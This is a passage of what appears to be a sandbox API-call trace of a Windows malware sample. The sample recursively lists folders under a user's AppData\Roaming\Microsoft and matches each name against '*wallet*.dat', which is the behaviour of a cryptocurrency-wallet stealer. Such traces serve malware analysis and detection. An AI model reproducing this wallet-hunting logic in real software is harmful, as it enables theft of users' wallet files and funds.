lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0175.348] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.348] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.348] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 0 [0175.348] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.349] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x816a7a21, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x54256, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0175.349] StrCmpCA (pszStr1="Document Building Blocks", pszStr2=".") returned 22 [0175.349] StrCmpCA (pszStr1="Document Building Blocks", pszStr2="..") returned 22 [0175.349] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned 72 [0175.349] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0175.349] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\Document Building Blocks") returned 34 [0175.349] PathMatchSpecA (pszFile="Document Building Blocks", pszSpec="*wallet*.dat") returned 0 [0175.349] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned 74 [0175.349] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\document building blocks\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.350] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.351] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0175.351] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.351] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.351] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x4, cFileName="1033", cAlternateFileName="")) returned 1 [0175.351] StrCmpCA (pszStr1="1033", pszStr2=".") returned 3 [0175.351] StrCmpCA (pszStr1="1033", pszStr2="..") returned 3 [0175.351] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned 77 [0175.351] StrCmpCA (pszStr1="Microsoft\\Document Building Blocks", pszStr2="") returned 77 [0175.351] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Document Building Blocks\\1033") returned 39 [0175.351] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0175.351] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned 79 [0175.351] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\document building blocks\\1033\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4eb090 [0175.351] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.351] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.351] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.351] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.351] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="16", cAlternateFileName="")) returned 1 [0175.351] StrCmpCA (pszStr1="16", pszStr2=".") returned 3 [0175.351] StrCmpCA (pszStr1="16", pszStr2="..") returned 3 [0175.351] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned 80 [0175.351] StrCmpCA (pszStr1="Microsoft\\Document Building Blocks\\1033", pszStr2="") returned 77 [0175.351] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Document Building Blocks\\1033\\16") returned 42 [0175.352] PathMatchSpecA (pszFile="16", pszSpec="*wallet*.dat") returned 0 [0175.352] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned 82 [0175.352] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x817190ef, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x196768, dwReserved1=0x1, cFileName=".", cAlternateFileName="")) returned 0x4ea810 [0175.352] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.352] FindNextFileA (in: hFindFile=0x4ea810, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x817190ef, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x196768, dwReserved1=0x1, cFileName="..", cAlternateFileName="")) returned 1 [0175.352] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.352] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.352] FindNextFileA (in: hFindFile=0x4ea810, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817190ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x817190ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5ca4c63b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x196768, dwReserved1=0x1, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0175.352] StrCmpCA (pszStr1="Built-In Building Blocks.dotx", pszStr2=".") returned 20 [0175.352] StrCmpCA (pszStr1="Built-In Building Blocks.dotx", pszStr2="..") returned 20 [0175.352] wsprintfA (in: param_1=0x19685c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 110 [0175.352] StrCmpCA (pszStr1="Microsoft\\Document Building Blocks\\1033\\16", pszStr2="") returned 77 [0175.352] wsprintfA (in: param_1=0x196964, param_2="%s\\%s" | out: param_1="Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 72 [0175.352] PathMatchSpecA (pszFile="Built-In Building Blocks.dotx", pszSpec="*wallet*.dat") returned 0 [0175.352] wsprintfA (in: param_1=0x19652c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx\\*") returned 112 [0175.352] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx\\*"), lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x817190ef, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x817190ef, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5ca4c63b, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x388cc7, nFileSizeLow=0x196768, dwReserved0=0x1, dwReserved1=0x750042, cFileName="i", cAlternateFileName="C")) returned 0xffffffff [0175.352] FindNextFileA (in: hFindFile=0x4ea810, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817190ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x817190ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5ca4c63b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x196768, dwReserved1=0x1, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 0 [0175.352] FindClose (in: hFindFile=0x4ea810 | out: hFindFile=0x4ea810) returned 1 [0175.353] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="16", cAlternateFileName="")) returned 0 [0175.353] FindClose (in: hFindFile=0x4eb090 | out: hFindFile=0x4eb090) returned 1 [0175.353] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x4, cFileName="1033", cAlternateFileName="")) returned 0 [0175.353] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.353] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x54256, cFileName="Excel", cAlternateFileName="")) returned 1 [0175.353] StrCmpCA (pszStr1="Excel", pszStr2=".") returned 23 [0175.353] StrCmpCA (pszStr1="Excel", pszStr2="..") returned 23 [0175.353] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel") returned 53 [0175.353] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0175.353] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\Excel") returned 15 [0175.353] PathMatchSpecA (pszFile="Excel", pszSpec="*wallet*.dat") returned 0 [0175.353] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\*") returned 55 [0175.353] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\excel\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x4eb090 [0175.354] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.354] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0175.354] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.354] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.354] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934f7bb4, ftCreationTime.dwHighDateTime=0x1d7b063, ftLastAccessTime.dwLowDateTime=0x934f7bb4, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0175.354] StrCmpCA (pszStr1="XLSTART", pszStr2=".") returned 42 [0175.354] StrCmpCA (pszStr1="XLSTART", pszStr2="..") returned 42 [0175.354] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned 61 [0175.355] StrCmpCA (pszStr1="Microsoft\\Excel", pszStr2="") returned 77 [0175.355] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Excel\\XLSTART") returned 23 [0175.355] PathMatchSpecA (pszFile="XLSTART", pszSpec="*wallet*.dat") returned 0 [0175.355] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned 63 [0175.355] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\excel\\xlstart\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934f7bb4, ftCreationTime.dwHighDateTime=0x1d7b063, ftLastAccessTime.dwLowDateTime=0x934f7bb4, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.355] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.355] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934f7bb4, ftCreationTime.dwHighDateTime=0x1d7b063, ftLastAccessTime.dwLowDateTime=0x934f7bb4, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.355] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.355] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.355] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934f7bb4, ftCreationTime.dwHighDateTime=0x1d7b063, ftLastAccessTime.dwLowDateTime=0x934f7bb4, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0175.355] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.355] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934f7bb4, ftCreationTime.dwHighDateTime=0x1d7b063, ftLastAccessTime.dwLowDateTime=0x934f7bb4, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0175.355] FindClose (in: hFindFile=0x4eb090 | out: hFindFile=0x4eb090) returned 1 [0175.355] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0175.355] StrCmpCA (pszStr1="Internet Explorer", pszStr2=".") returned 27 [0175.355] StrCmpCA (pszStr1="Internet Explorer", pszStr2="..") returned 27 [0175.355] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 65 [0175.356] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0175.356] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer") returned 27 [0175.356] PathMatchSpecA (pszFile="Internet Explorer", pszSpec="*wallet*.dat") returned 0 [0175.356] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned 67 [0175.356] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x4eb090 [0175.356] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.356] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0175.356] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.356] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.356] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6654de95, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0175.356] StrCmpCA (pszStr1="Quick Launch", pszStr2=".") returned 35 [0175.356] StrCmpCA (pszStr1="Quick Launch", pszStr2="..") returned 35 [0175.356] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 78 [0175.356] StrCmpCA (pszStr1="Microsoft\\Internet Explorer", pszStr2="") returned 77 [0175.356] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch") returned 40 [0175.356] PathMatchSpecA (pszFile="Quick Launch", pszSpec="*wallet*.dat") returned 0 [0175.356] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned 80 [0175.356] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6654de95, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6, dwReserved1=0x4c0260, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.357] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.357] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6654de95, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6, dwReserved1=0x4c0260, cFileName="..", cAlternateFileName="")) returned 1 [0175.357] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.357] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.357] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d053a9f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d053a9f, 